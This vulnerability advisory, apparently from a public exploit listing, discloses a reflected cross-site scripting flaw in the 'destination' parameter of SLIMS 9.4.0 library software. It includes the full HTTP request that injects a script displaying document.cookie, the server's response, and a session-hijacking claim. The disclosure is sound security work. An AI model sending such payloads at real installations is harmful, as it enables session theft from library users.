## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9
XSS-Reflected- PHPSESSID Hijacking
## Author: nu11secur1ty
## Date: 12.08.2022
## Vendor: https://slims.web.id/web/
## Software: https://slims.web.id/web/news/rilis-9.4.0/
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0
## Description:
The value of the `destination` request parameter is copied into the
value of an HTML tag attribute which is encapsulated in double
quotation marks.
The payload zbuip">jgoihbmmygl
was submitted in the destination parameter.
This input was echoed unmodified in the application's response. The
attacker can hijack the session of some users of the system.
## STATUS: HIGH Vulnerability
[+] Payload:
```GET
GET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=Login
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48m
Origin: http://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=member
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
[+] Response:
```HTTP/1
HTTP/1.1 200 OK
Date: Thu, 08 Dec 2022 18:43:20 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30590
Open Source Library Management System | Senayan
Please insert your member ID
and password given by library system administrator. If you are
library's member and don't have a password yet, please contact library
staff.